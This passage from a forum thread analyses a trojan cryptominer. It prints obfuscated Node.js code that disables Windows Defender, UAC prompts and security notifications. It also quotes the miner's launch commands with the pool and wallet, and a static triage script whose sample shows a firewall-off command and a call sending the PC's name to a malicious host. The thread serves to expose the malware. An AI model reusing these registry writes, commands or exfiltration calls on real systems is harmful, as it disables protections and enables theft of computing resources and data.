"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x41\x64\x6D\x69\x6E": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x55\x73\x65\x72": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['createKey'](['HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'], function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x43\x55\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x4E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x5C\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x57\x69\x6E\x64\x6F\x77\x73\x2E\x53\x79\x73\x74\x65\x6D\x54\x6F\x61\x73\x74\x2E\x53\x65\x63\x75\x72\x69\x74\x79\x41\x6E\x64\x4D\x61\x69\x6E\x74\x65\x6E\x61\x6E\x63\x65": {
"\x45\x6E\x61\x62\x6C\x65\x64": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
checkgpu()
})
})
})
})
})
})
})
})
})
|
|
|
03/12/2018, 05:00
|
#719
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
I'm not code savvy, simplify it for me?
|
|
|
03/12/2018, 05:20
|
#720
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
Quote:
Originally Posted by Nightzfury
I'm not code savvy, simplify it for me?
|
Simplified: it disables Windows Defender, adds a scheduled task to hide and run Node.js with JavaScript that uploads information about your PC (OS, serial, PC name and others) to a malicious site, downloads a miner depending on the GPU and launches it.
Mining process that needs to run (AMD):
servicehost.exe -epool stratum+tcp://lb.geo.pirlpool.eu:8002 -ewal 0x3c7c0c1ABbC596ae6E8A6a4f75Ee45D06110c70d -epsw x -allpools 1 -allcoins exp -gser 2 -eworker a0 -li 25 -dbg -1
nvidia:
servicehost.exe -epool stratum+tcp://lb.geo.pirlpool.eu:8002 -ewal 0x3c7c0c1ABbC596ae6E8A6a4f75Ee45D06110c70d -epsw x -allpools 1 -allcoins exp -gser 2 -eworker n1 -li 25 -dbg -1
|
|
|
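The behaviour summarised in post #720 can be confirmed without running the sample. The following is an added example, not part of the thread or of the posted code: it reads an excerpt of the obfuscated source purely as text, decodes the `\xNN` escapes, and lists the registry writes, admin commands and contacted hosts. The function names and the `SAMPLE` excerpt are constructed for illustration.

```javascript
// Added example: static triage of obfuscated Node.js source. The sample is
// only read as text; nothing in it is executed.

// Constructed input: a few lines excerpted from the code posted in the thread.
const SAMPLE = String.raw`
var cmd = 'netsh advfirewall set allprofiles state off';
var cmz = 'schtasks.exe /query /TN "Microsoft\Windows\AppID\SmartScreens"';
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x41\x64\x6D\x69\x6E": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {})
})
hget('http://xmbolafi.club/pcreg.php?type=update&pc=' + pcname)
`;

// Decode \xNN escapes as text, without eval() or new Function().
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// A double-quoted literal made up entirely of \xNN escapes.
const HEX_STR = String.raw`"((?:\\x[0-9a-fA-F]{2})+)"`;

// Shape passed to regedit putValue in the sample:
//   "<key>": { "<value name>": { value: '<data>', type: '<type>' } }
const REG_WRITE = new RegExp(
  HEX_STR + String.raw`\s*:\s*\{\s*` + HEX_STR +
  String.raw`\s*:\s*\{\s*value:\s*'([^']*)',\s*type:\s*'(\w+)'`, 'g');

// What the value/data pairs seen in the thread's sample mean on Windows.
const NOTES = {
  'DisableAntiSpyware=1': 'Windows Defender disabled by policy',
  'DisableRealtimeMonitoring=1': 'Defender real-time monitoring disabled',
  'ConsentPromptBehaviorAdmin=0': 'UAC: administrators elevate without a prompt',
  'ConsentPromptBehaviorUser=0': 'UAC: standard-user elevation requests auto-denied',
};

function extractRegistryWrites(source) {
  const writes = [];
  for (const m of source.matchAll(REG_WRITE)) {
    const name = decodeHexEscapes(m[2]);
    writes.push({
      key: decodeHexEscapes(m[1]),
      name,
      data: m[3],
      type: m[4],
      note: NOTES[name + '=' + m[3]] || 'unclassified',
    });
  }
  return writes;
}

// Single-quoted literals that start with a Windows admin tool.
function extractCommands(source) {
  const re = /'((?:netsh|schtasks(?:\.exe)?|taskkill)\s[^']*)'/g;
  return [...source.matchAll(re)].map((m) => m[1]);
}

// Hosts contacted over HTTP, defanged for safe pasting into reports.
// The optional whitespace covers the "http: //" form seen in the posted code.
function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\s*\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase().replace(/\./g, '[.]'));
  }
  return [...hosts];
}

function triage(source) {
  return {
    registry: extractRegistryWrites(source),
    commands: extractCommands(source),
    hosts: extractHosts(source),
  };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

The decoded key and value names are what to look for on a machine that ran the tool, alongside the scheduled task named in the `schtasks.exe` command.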
All times are GMT +1.
|
|